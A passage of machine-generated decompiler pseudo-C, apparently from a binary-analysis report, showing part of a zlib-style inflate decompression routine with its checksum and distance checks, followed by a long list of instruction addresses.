                                                                                        											__eflags =  *_t728;
                                                                                        											goto L273;
                                                                                        										} else {
                                                                                        											L268:
                                                                                        											__edx =  *(__ebp - 0x14);
                                                                                        											while(1) {
                                                                                        												L269:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L270:
                                                                                        												__eax =  *__edx & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edx & 0x000000ff) << __cl;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												 *(__ebp - 8) =  *(__ebp - 8) + (( *__edx & 0x000000ff) << __cl);
                                                                                        												__edx = __edx + 1;
                                                                                        												__esi = __esi + 8;
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												 *(__ebp - 0x14) = __edx;
                                                                                        												__eflags = __esi - __edi;
                                                                                        												if(__esi < __edi) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													L271:
                                                                                        													__edx =  *(__ebp - 8);
                                                                                        													goto L272;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x16:
                                                                                        									L274:
                                                                                        									__ecx =  *(__ecx + 0x5c);
                                                                                        									__eax = 1;
                                                                                        									_t734 = (1 << __cl) - 1; // 0x0
                                                                                        									__ecx = _t734;
                                                                                        									__eax =  *(__ebp - 0xc);
                                                                                        									 *(__ebp - 0x40) = __ecx;
                                                                                        									__ecx = __ecx & __edx;
                                                                                        									__edi =  *( *(__ebp - 0xc) + 0x54);
                                                                                        									 *(__ebp - 0x3c) = __edi;
                                                                                        									__eax =  *(__edi + __ecx * 4);
                                                                                        									__eax = __eax >> 8;
                                                                                        									__ecx = __cl & 0x000000ff;
                                                                                        									__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        									if((__cl & 0x000000ff) <= __esi) {
                                                                                        										L279:
                                                                                        										__eflags = __al & 0x000000f0;
                                                                                        										if((__al & 0x000000f0) != 0) {
                                                                                        											L284:
                                                                                        											__ebx =  *(__ebp - 0xc);
                                                                                        											goto L285;
                                                                                        										} else {
                                                                                        											L280:
                                                                                        											__ecx = __eax;
                                                                                        											__edi = 1;
                                                                                        											__ecx = __eax >> 8;
                                                                                        											__edx = __eax;
                                                                                        											__ebx = __cl & 0x000000ff;
                                                                                        											__al & 0x000000ff = __ebx + (__al & 0x000000ff);
                                                                                        											__eax = __eax >> 0x10;
                                                                                        											__edi = 1 << __cl;
                                                                                        											__ecx = __ebx;
                                                                                        											__edi = (1 << __cl) - 1;
                                                                                        											 *(__ebp - 0x34) = __edx;
                                                                                        											(0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8) = ((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl;
                                                                                        											__ecx =  *(__ebp - 0x3c);
                                                                                        											__edi = __eax + (((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl);
                                                                                        											__eax =  *( *(__ebp - 0x3c) + (__eax + (((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl)) * 4);
                                                                                        											__eax = __eax >> 8;
                                                                                        											__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
                                                                                        											__eflags = __ebx + (__cl & 0x000000ff) - __esi;
                                                                                        											if(__ebx + (__cl & 0x000000ff) <= __esi) {
                                                                                        												L283:
                                                                                        												__ebx =  *(__ebp - 0xc);
                                                                                        												__ecx = __dh & 0x000000ff;
                                                                                        												__edx =  *(__ebp - 8);
                                                                                        												__esi = __esi - __ecx;
                                                                                        												__edx =  *(__ebp - 8) >> __cl;
                                                                                        												 *((intOrPtr*)(__ebx + 0x1bc8)) =  *((intOrPtr*)(__ebx + 0x1bc8)) + __ecx;
                                                                                        												L285:
                                                                                        												__eax = __eax >> 8;
                                                                                        												__ecx = __cl & 0x000000ff;
                                                                                        												 *((intOrPtr*)(__ebx + 0x1bc8)) =  *((intOrPtr*)(__ebx + 0x1bc8)) + __ecx;
                                                                                        												__esi = __esi - __ecx;
                                                                                        												__edx = __edx >> __cl;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												 *(__ebp - 0x18) = __esi;
                                                                                        												__eflags = __al & 0x00000040;
                                                                                        												if((__al & 0x00000040) == 0) {
                                                                                        													L287:
                                                                                        													__ecx = __eax;
                                                                                        													__eax = __al & 0x000000ff;
                                                                                        													__ecx = __ecx >> 0x10;
                                                                                        													__eax = __al & 0xf;
                                                                                        													__eflags = __eax;
                                                                                        													 *(__ebx + 0x48) = __ecx;
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													__ebx =  *(__ebp - 0x10);
                                                                                        													 *(__ecx + 0x4c) = __eax;
                                                                                        													 *(__ecx + 4) = 0x3f4b;
                                                                                        													goto L288;
                                                                                        												} else {
                                                                                        													L286:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													__ebx =  *(__ebp - 0x10);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "invalid distance code";
                                                                                        													goto L261;
                                                                                        												}
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													L281:
                                                                                        													__eax =  *(__ebp - 0x10);
                                                                                        													__eflags = __eax;
                                                                                        													if(__eax == 0) {
                                                                                        														goto L102;
                                                                                        													}
                                                                                        													L282:
                                                                                        													__ebx =  *(__ebp - 0x14);
                                                                                        													 *(__ebp - 0x10) = __eax;
                                                                                        													__ecx = __esi;
                                                                                        													__edi = 1;
                                                                                        													__esi = __esi + 8;
                                                                                        													__eax =  *__ebx & 0x000000ff;
                                                                                        													__ebx = __ebx + 1;
                                                                                        													 *(__ebp - 8) = __eax +  *(__ebp - 8);
                                                                                        													__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                        													 *(__ebp - 0x14) = __ebx;
                                                                                        													__ebx = __dh & 0x000000ff;
                                                                                        													__dl & 0x000000ff = __ebx + (__dl & 0x000000ff);
                                                                                        													__edi = 1 << __cl;
                                                                                        													__ecx = __ebx;
                                                                                        													(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8);
                                                                                        													((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl = (((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                        													__eax =  *(__ebp - 0x3c);
                                                                                        													__eax =  *( *(__ebp - 0x3c) + ((((0x00000001 << __cl) - 0x00000001 &  *(__ebp - 8)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                        													__eax = __eax >> 8;
                                                                                        													__cl & 0x000000ff = __ebx + (__cl & 0x000000ff);
                                                                                        													__eflags = __ebx + (__cl & 0x000000ff) - __esi;
                                                                                        													if(__ebx + (__cl & 0x000000ff) > __esi) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L283;
                                                                                        													}
                                                                                        													goto L360;
                                                                                        												}
                                                                                        												goto L102;
                                                                                        											}
                                                                                        										}
                                                                                        									} else {
                                                                                        										L275:
                                                                                        										__edx =  *(__ebp - 0x14);
                                                                                        										while(1) {
                                                                                        											L276:
                                                                                        											__eflags = __ebx;
                                                                                        											if(__ebx == 0) {
                                                                                        												goto L101;
                                                                                        											}
                                                                                        											L277:
                                                                                        											__eax =  *__edx & 0x000000ff;
                                                                                        											__ecx = __esi;
                                                                                        											__eax = ( *__edx & 0x000000ff) << __cl;
                                                                                        											__ebx = __ebx - 1;
                                                                                        											__ecx =  *(__ebp - 8);
                                                                                        											__edx = __edx + 1;
                                                                                        											__ecx = __eax +  *(__ebp - 8);
                                                                                        											 *(__ebp - 0x10) = __ebx;
                                                                                        											__eax =  *(__ebp - 0x40);
                                                                                        											__esi = __esi + 8;
                                                                                        											__eax =  *(__ebp - 0x40) & __ecx;
                                                                                        											 *(__ebp - 8) = __ecx;
                                                                                        											 *(__ebp - 0x14) = __edx;
                                                                                        											__eax =  *(__edi + ( *(__ebp - 0x40) & __ecx) * 4);
                                                                                        											__eax = __eax >> 8;
                                                                                        											__ecx = __cl & 0x000000ff;
                                                                                        											__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        											if((__cl & 0x000000ff) > __esi) {
                                                                                        												continue;
                                                                                        											} else {
                                                                                        												L278:
                                                                                        												__edx =  *(__ebp - 8);
                                                                                        												goto L279;
                                                                                        											}
                                                                                        											goto L360;
                                                                                        										}
                                                                                        										goto L101;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x17:
                                                                                        									L288:
                                                                                        									__edi =  *(__ecx + 0x4c);
                                                                                        									__eflags = __edi;
                                                                                        									if(__edi == 0) {
                                                                                        										L295:
                                                                                        										 *(__ecx + 4) = 0x3f4c;
                                                                                        										goto L296;
                                                                                        									} else {
                                                                                        										L289:
                                                                                        										__eflags = __esi - __edi;
                                                                                        										if(__esi >= __edi) {
                                                                                        											L294:
                                                                                        											__ecx = __edi;
                                                                                        											1 = 1 << __cl;
                                                                                        											__esi = __esi - __edi;
                                                                                        											__ecx =  *(__ebp - 0xc);
                                                                                        											(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 & __edx;
                                                                                        											 *(__ebp - 0x18) = __esi;
                                                                                        											 *((intOrPtr*)( *(__ebp - 0xc) + 0x48)) =  *((intOrPtr*)( *(__ebp - 0xc) + 0x48)) + ((0x00000001 << __cl) - 0x00000001 & __edx);
                                                                                        											__ecx = __edi;
                                                                                        											__edx = __edx >> __cl;
                                                                                        											__ecx =  *(__ebp - 0xc);
                                                                                        											 *(__ebp - 8) = __edx;
                                                                                        											_t801 = __ecx + 0x1bc8;
                                                                                        											 *_t801 = __edi +  *(__ecx + 0x1bc8);
                                                                                        											__eflags =  *_t801;
                                                                                        											goto L295;
                                                                                        										} else {
                                                                                        											L290:
                                                                                        											__edx =  *(__ebp - 0x14);
                                                                                        											while(1) {
                                                                                        												L291:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L292:
                                                                                        												__eax =  *__edx & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edx & 0x000000ff) << __cl;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												 *(__ebp - 8) =  *(__ebp - 8) + (( *__edx & 0x000000ff) << __cl);
                                                                                        												__edx = __edx + 1;
                                                                                        												__esi = __esi + 8;
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												 *(__ebp - 0x14) = __edx;
                                                                                        												__eflags = __esi - __edi;
                                                                                        												if(__esi < __edi) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													L293:
                                                                                        													__edx =  *(__ebp - 8);
                                                                                        													goto L294;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x18:
                                                                                        									L296:
                                                                                        									__edi =  *(__ebp - 0x1c);
                                                                                        									__eflags = __edi;
                                                                                        									if(__edi == 0) {
                                                                                        										goto L101;
                                                                                        									} else {
                                                                                        										L297:
                                                                                        										__eax =  *(__ebp - 0x28);
                                                                                        										__eax =  *(__ebp - 0x28) - __edi;
                                                                                        										__edi =  *(__ecx + 0x48);
                                                                                        										__eflags = __edi - __eax;
                                                                                        										if(__edi <= __eax) {
                                                                                        											L305:
                                                                                        											__eax =  *(__ebp - 0x24);
                                                                                        											__eax =  *(__ebp - 0x24) - __edi;
                                                                                        											__eflags = __eax;
                                                                                        											 *(__ebp - 0x34) = __eax;
                                                                                        											__eax =  *(__ecx + 0x44);
                                                                                        											 *(__ebp - 0x3c) = __eax;
                                                                                        											goto L306;
                                                                                        										} else {
                                                                                        											L298:
                                                                                        											__edi = __edi - __eax;
                                                                                        											__eflags = __edi -  *((intOrPtr*)(__ecx + 0x30));
                                                                                        											if(__edi <=  *((intOrPtr*)(__ecx + 0x30))) {
                                                                                        												L301:
                                                                                        												__ebx =  *(__ecx + 0x34);
                                                                                        												__eflags = __edi - __ebx;
                                                                                        												if(__edi <= __ebx) {
                                                                                        													 *((intOrPtr*)(__ecx + 0x38)) =  *((intOrPtr*)(__ecx + 0x38)) - __edi;
                                                                                        													__eax =  *((intOrPtr*)(__ecx + 0x38)) - __edi + __ebx;
                                                                                        													__eflags = __eax;
                                                                                        												} else {
                                                                                        													__eax =  *(__ecx + 0x2c);
                                                                                        													__edi = __edi - __ebx;
                                                                                        													__eax =  *(__ecx + 0x2c) - __edi;
                                                                                        													__eax =  *(__ecx + 0x2c) - __edi +  *((intOrPtr*)(__ecx + 0x38));
                                                                                        												}
                                                                                        												 *(__ebp - 0x34) = __eax;
                                                                                        												__eax =  *(__ecx + 0x44);
                                                                                        												__eflags = __edi - __eax;
                                                                                        												__eax =  <=  ? __edi : __eax;
                                                                                        												 *(__ebp - 0x3c) =  <=  ? __edi : __eax;
                                                                                        												L306:
                                                                                        												__edi =  *(__ebp - 0x1c);
                                                                                        												__ebx =  *(__ebp - 0x3c);
                                                                                        												__eflags = __ebx - __edi;
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												__edi =  <=  ? __ebx : __edi;
                                                                                        												__ebx =  *(__ebp - 0x34);
                                                                                        												 *(__ebp - 0x1c) =  *(__ebp - 0x1c) - __edi;
                                                                                        												 *( *(__ebp - 0xc) + 0x44) = __eax;
                                                                                        												__ecx =  *(__ebp - 0x24);
                                                                                        												__ebx =  *(__ebp - 0x34) - __ecx;
                                                                                        												__eflags = __ebx;
                                                                                        												do {
                                                                                        													L307:
                                                                                        													__al =  *((intOrPtr*)(__ebx + __ecx));
                                                                                        													 *__ecx = __al;
                                                                                        													__ecx = __ecx + 1;
                                                                                        													__edi = __edi - 1;
                                                                                        													__eflags = __edi;
                                                                                        												} while (__edi != 0);
                                                                                        												__ebx =  *(__ebp - 0x10);
                                                                                        												 *(__ebp - 0x24) = __ecx;
                                                                                        												__ecx =  *(__ebp - 0xc);
                                                                                        												__eflags =  *(__ecx + 0x44) - __edi;
                                                                                        												if( *(__ecx + 0x44) == __edi) {
                                                                                        													 *(__ecx + 4) = 0x3f48;
                                                                                        												}
                                                                                        												goto L262;
                                                                                        											} else {
                                                                                        												L299:
                                                                                        												__eflags =  *(__ecx + 0x1bc4);
                                                                                        												if( *(__ecx + 0x1bc4) == 0) {
                                                                                        													goto L301;
                                                                                        												} else {
                                                                                        													L300:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "invalid distance too far back";
                                                                                        													L261:
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													L262:
                                                                                        													__edi =  *(__ebp - 0x14);
                                                                                        													goto L263;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x19:
                                                                                        									L310:
                                                                                        									__eflags =  *(__ebp - 0x1c);
                                                                                        									if( *(__ebp - 0x1c) == 0) {
                                                                                        										goto L101;
                                                                                        									} else {
                                                                                        										L311:
                                                                                        										__ebx =  *(__ebp - 0x24);
                                                                                        										__al =  *(__ecx + 0x44);
                                                                                        										 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
                                                                                        										 *(__ebp - 0x1c) =  *(__ebp - 0x1c) - 1;
                                                                                        										 *( *(__ebp - 0x24)) = __al;
                                                                                        										__ebx =  *(__ebp - 0x10);
                                                                                        										 *(__ecx + 4) = 0x3f48;
                                                                                        										goto L263;
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x1a:
                                                                                        									L312:
                                                                                        									__eflags =  *(__ecx + 0xc);
                                                                                        									if( *(__ecx + 0xc) == 0) {
                                                                                        										L330:
                                                                                        										 *(__ecx + 4) = 0x3f4f;
                                                                                        										goto L331;
                                                                                        									} else {
                                                                                        										L313:
                                                                                        										__eflags = __esi - 0x20;
                                                                                        										if(__esi >= 0x20) {
                                                                                        											L318:
                                                                                        											__eax =  *(__ebp - 0x1c);
                                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x28) -  *(__ebp - 0x1c);
                                                                                        											__eax =  *(__ebp + 8);
                                                                                        											__edi =  *(__ebp - 0x28);
                                                                                        											 *((intOrPtr*)( *(__ebp + 8) + 0x14)) =  *((intOrPtr*)( *(__ebp + 8) + 0x14)) + __edi;
                                                                                        											__eax = __edi;
                                                                                        											 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(__ecx + 0x20)) + __edi;
                                                                                        											__eax =  *(__ecx + 0xc);
                                                                                        											__edi =  *(__ebp - 0x14);
                                                                                        											__eflags = __al & 0x00000004;
                                                                                        											if((__al & 0x00000004) != 0) {
                                                                                        												__eflags =  *(__ebp - 0x28);
                                                                                        												if( *(__ebp - 0x28) != 0) {
                                                                                        													__eax =  *(__ebp - 0x24);
                                                                                        													_push( *(__ebp - 0x28));
                                                                                        													__eax =  *(__ebp - 0x24) -  *(__ebp - 0x28);
                                                                                        													__eflags =  *(__ecx + 0x14);
                                                                                        													__edx =  *(__ecx + 0x1c);
                                                                                        													_push( *(__ebp - 0x24) -  *(__ebp - 0x28));
                                                                                        													_push( *(__ecx + 0x1c));
                                                                                        													if( *(__ecx + 0x14) == 0) {
                                                                                        														__eax = E0018A060();
                                                                                        													} else {
                                                                                        														__eax = E0018BB60();
                                                                                        													}
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													__edx =  *(__ebp + 8);
                                                                                        													 *(__ecx + 0x1c) = __eax;
                                                                                        													 *( *(__ebp + 8) + 0x30) = __eax;
                                                                                        													__eax =  *(__ecx + 0xc);
                                                                                        													__edx =  *(__ebp - 8);
                                                                                        												}
                                                                                        											}
                                                                                        											__ebx =  *(__ebp - 0x1c);
                                                                                        											 *(__ebp - 0x28) =  *(__ebp - 0x1c);
                                                                                        											__ebx =  *(__ebp - 0x10);
                                                                                        											__eflags = __al & 0x00000004;
                                                                                        											if((__al & 0x00000004) == 0) {
                                                                                        												L329:
                                                                                        												__edx = 0;
                                                                                        												__esi = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *(__ebp - 8) = 0;
                                                                                        												 *(__ebp - 0x18) = 0;
                                                                                        												goto L330;
                                                                                        											} else {
                                                                                        												L325:
                                                                                        												__eflags =  *(__ecx + 0x14);
                                                                                        												__eax = __edx;
                                                                                        												if( *(__ecx + 0x14) == 0) {
                                                                                        													 *(__ebp - 0x2c) = __eax;
                                                                                        													__edx = __edx << 0x10;
                                                                                        													 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + (__edx << 0x10);
                                                                                        													__eax = __edx;
                                                                                        													 *(__ebp - 0x2c) =  *(__ebp - 0x2c) << 8;
                                                                                        													__edx >> 8 = __edx >> 0x00000008 & 0x0000ff00;
                                                                                        													 *(__ebp - 0x2c) =  *(__ebp - 0x2c) + (__edx >> 0x00000008 & 0x0000ff00);
                                                                                        													__edx = __edx >> 0x18;
                                                                                        													_t889 = __ebp - 0x2c;
                                                                                        													 *_t889 =  *(__ebp - 0x2c) + (__edx >> 0x18);
                                                                                        													__eflags =  *_t889;
                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                        												}
                                                                                        												__eflags = __eax -  *(__ecx + 0x1c);
                                                                                        												if(__eax ==  *(__ecx + 0x1c)) {
                                                                                        													goto L329;
                                                                                        												} else {
                                                                                        													L328:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "incorrect data check";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													goto L263;
                                                                                        												}
                                                                                        											}
                                                                                        										} else {
                                                                                        											L314:
                                                                                        											while(1) {
                                                                                        												L315:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L101;
                                                                                        												}
                                                                                        												L316:
                                                                                        												__eax =  *__edi & 0x000000ff;
                                                                                        												__ecx = __esi;
                                                                                        												__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        												__esi = __esi + 8;
                                                                                        												__ebx = __ebx - 1;
                                                                                        												 *(__ebp - 0x18) = __esi;
                                                                                        												__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        												 *(__ebp - 0x10) = __ebx;
                                                                                        												__edi = __edi + 1;
                                                                                        												 *(__ebp - 8) = __edx;
                                                                                        												 *(__ebp - 0x14) = __edi;
                                                                                        												__eflags = __esi - 0x20;
                                                                                        												if(__esi < 0x20) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													L317:
                                                                                        													__ecx =  *(__ebp - 0xc);
                                                                                        													goto L318;
                                                                                        												}
                                                                                        												goto L360;
                                                                                        											}
                                                                                        											goto L101;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x1b:
                                                                                        									L331:
                                                                                        									__eflags =  *(__ecx + 0xc);
                                                                                        									if( *(__ecx + 0xc) == 0) {
                                                                                        										L341:
                                                                                        										 *(__ecx + 4) = 0x3f50;
                                                                                        										goto L342;
                                                                                        									} else {
                                                                                        										L332:
                                                                                        										__eflags =  *(__ecx + 0x14);
                                                                                        										if( *(__ecx + 0x14) == 0) {
                                                                                        											goto L341;
                                                                                        										} else {
                                                                                        											L333:
                                                                                        											__eflags = __esi - 0x20;
                                                                                        											if(__esi >= 0x20) {
                                                                                        												L337:
                                                                                        												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                        												if(__edx ==  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                        													L340:
                                                                                        													 *(__ebp - 8) = 0;
                                                                                        													__esi = 0;
                                                                                        													__eflags = 0;
                                                                                        													goto L341;
                                                                                        												} else {
                                                                                        													L338:
                                                                                        													__eax =  *(__ebp + 8);
                                                                                        													 *( *(__ebp + 8) + 0x18) = "incorrect length check";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													goto L263;
                                                                                        												}
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													L334:
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L101;
                                                                                        													}
                                                                                        													L335:
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__esi = __esi + 8;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													 *(__ebp - 0x18) = __esi;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													 *(__ebp - 0x10) = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													 *(__ebp - 8) = __edx;
                                                                                        													 *(__ebp - 0x14) = __edi;
                                                                                        													__eflags = __esi - 0x20;
                                                                                        													if(__esi < 0x20) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														L336:
                                                                                        														__ecx =  *(__ebp - 0xc);
                                                                                        														goto L337;
                                                                                        													}
                                                                                        													goto L360;
                                                                                        												}
                                                                                        												goto L101;
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        									goto L360;
                                                                                        								case 0x1c:
                                                                                        									L342:
                                                                                        									 *(__ebp - 0x30) = 1;
                                                                                        									goto L101;
                                                                                        								case 0x1d:
                                                                                        									L343:
                                                                                        									 *(__ebp - 0x30) = 0xfffffffd;
                                                                                        									goto L101;
                                                                                        								case 0x1e:
                                                                                        									goto L110;
                                                                                        							}
                                                                                        						}
                                                                                        						L264:
                                                                                        						return 0xfffffffe;
                                                                                        					}
                                                                                        					goto L360;
                                                                                        				}
                                                                                        			}

























                                                                                        0x00188de3
                                                                                        0x00188de3
                                                                                        0x00188de3
                                                                                        0x00188de3
                                                                                        0x00188de3
                                                                                        0x00188de5
                                                                                        0x00188de8
                                                                                        0x00188dea
                                                                                        0x00188dec
                                                                                        0x00188def
                                                                                        0x00188df5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188df7
                                                                                        0x00188df7
                                                                                        0x00188df9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188dff
                                                                                        0x00188e06
                                                                                        0x00188e09
                                                                                        0x00188e0a
                                                                                        0x00188e0d
                                                                                        0x00188e0f
                                                                                        0x00188e12
                                                                                        0x00188e13
                                                                                        0x00188e16
                                                                                        0x00188e1c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188e1c
                                                                                        0x00188a5a
                                                                                        0x00188a5a
                                                                                        0x00188a5d
                                                                                        0x00188a5d
                                                                                        0x00188a60
                                                                                        0x00188a60
                                                                                        0x00188a66
                                                                                        0x00188a69
                                                                                        0x00188a6f
                                                                                        0x00188a75
                                                                                        0x00188a7b
                                                                                        0x00188a81
                                                                                        0x00188a84
                                                                                        0x00188a87
                                                                                        0x00188a8a
                                                                                        0x00188ab3
                                                                                        0x00188abd
                                                                                        0x00188ac7
                                                                                        0x00000000
                                                                                        0x00188acd
                                                                                        0x00188acd
                                                                                        0x00188acd
                                                                                        0x00188ad4
                                                                                        0x00188adf
                                                                                        0x00188adf
                                                                                        0x00188a8c
                                                                                        0x00188a8c
                                                                                        0x00188a8f
                                                                                        0x00189af6
                                                                                        0x00189af9
                                                                                        0x00189afc
                                                                                        0x00189aff
                                                                                        0x00189b02
                                                                                        0x00189b05
                                                                                        0x00189b0c
                                                                                        0x00189b0f
                                                                                        0x00189b12
                                                                                        0x00189b16
                                                                                        0x00189b1b
                                                                                        0x00189b24
                                                                                        0x00189b25
                                                                                        0x00189b26
                                                                                        0x00189b27
                                                                                        0x00189b30
                                                                                        0x00189b29
                                                                                        0x00189b29
                                                                                        0x00189b29
                                                                                        0x00189b35
                                                                                        0x00189b38
                                                                                        0x00189b38
                                                                                        0x00189b16
                                                                                        0x00189b3b
                                                                                        0x00189b3b
                                                                                        0x00189b44
                                                                                        0x00189b52
                                                                                        0x00189b52
                                                                                        0x00189b46
                                                                                        0x00189b46
                                                                                        0x00189b4c
                                                                                        0x00000000
                                                                                        0x00189b4e
                                                                                        0x00189b4e
                                                                                        0x00189b4e
                                                                                        0x00189b4e
                                                                                        0x00189b4c
                                                                                        0x00189b57
                                                                                        0x00189b57
                                                                                        0x00189b5c
                                                                                        0x00189b63
                                                                                        0x00189b70
                                                                                        0x00189b74
                                                                                        0x00189b76
                                                                                        0x00189b76
                                                                                        0x00189b79
                                                                                        0x00189b7f
                                                                                        0x00189b82
                                                                                        0x00189b8a
                                                                                        0x00189b8e
                                                                                        0x00189ba6
                                                                                        0x00189baf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189b84
                                                                                        0x00189b84
                                                                                        0x00189b88
                                                                                        0x00189b90
                                                                                        0x00189b90
                                                                                        0x00189b9c
                                                                                        0x00189ba3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00189b88
                                                                                        0x00188a95
                                                                                        0x00188a95
                                                                                        0x00188a95
                                                                                        0x00188a95
                                                                                        0x00188a9d
                                                                                        0x00000000
                                                                                        0x00188aa3
                                                                                        0x00188aa3
                                                                                        0x00188aa8
                                                                                        0x00000000
                                                                                        0x00188aaa
                                                                                        0x00188aaa
                                                                                        0x00188aad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188aad
                                                                                        0x00188aa8
                                                                                        0x00188a9d
                                                                                        0x00188a8f
                                                                                        0x00000000
                                                                                        0x00188e1e
                                                                                        0x00188e20
                                                                                        0x00188e25
                                                                                        0x00188e2d
                                                                                        0x00188e30
                                                                                        0x00188e48
                                                                                        0x00188e4b
                                                                                        0x00188e4d
                                                                                        0x00188e4f
                                                                                        0x00188e56
                                                                                        0x00188e59
                                                                                        0x00188e5c
                                                                                        0x00188e63
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188e32
                                                                                        0x00188e32
                                                                                        0x00188e35
                                                                                        0x00188e3c
                                                                                        0x001895fe
                                                                                        0x001895fe
                                                                                        0x001895fe
                                                                                        0x001895fe
                                                                                        0x00189601
                                                                                        0x00189604
                                                                                        0x0018960c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00188510
                                                                                        0x00188510
                                                                                        0x00000000
                                                                                        0x00188517
                                                                                        0x00188517
                                                                                        0x0018851a
                                                                                        0x0018851f
                                                                                        0x0018852d
                                                                                        0x0018852d
                                                                                        0x00188530
                                                                                        0x0018855f
                                                                                        0x0018855f
                                                                                        0x00188561
                                                                                        0x001885b9
                                                                                        0x001885b9
                                                                                        0x001885bc
                                                                                        0x001885c3
                                                                                        0x001885c5
                                                                                        0x001885c7
                                                                                        0x001885c7
                                                                                        0x001885ce
                                                                                        0x001885ce
                                                                                        0x001885d1
                                                                                        0x001885d3
                                                                                        0x001886af
                                                                                        0x001886b2
                                                                                        0x001886b9
                                                                                        0x001885d9
                                                                                        0x001885d9
                                                                                        0x001885e6
                                                                                        0x001885ef
                                                                                        0x001885f2
                                                                                        0x001885f4
                                                                                        0x001885f7
                                                                                        0x00000000
                                                                                        0x001885fd
                                                                                        0x001885fd
                                                                                        0x00188601
                                                                                        0x00188603
                                                                                        0x0018861b
                                                                                        0x0018861b
                                                                                        0x0018861e
                                                                                        0x00188621
                                                                                        0x00188626
                                                                                        0x0018862c
                                                                                        0x0018862f
                                                                                        0x00188632
                                                                                        0x00188635
                                                                                        0x00188637
                                                                                        0x0018863a
                                                                                        0x0018863d
                                                                                        0x0018863f
                                                                                        0x00188642
                                                                                        0x00188642
                                                                                        0x00188645
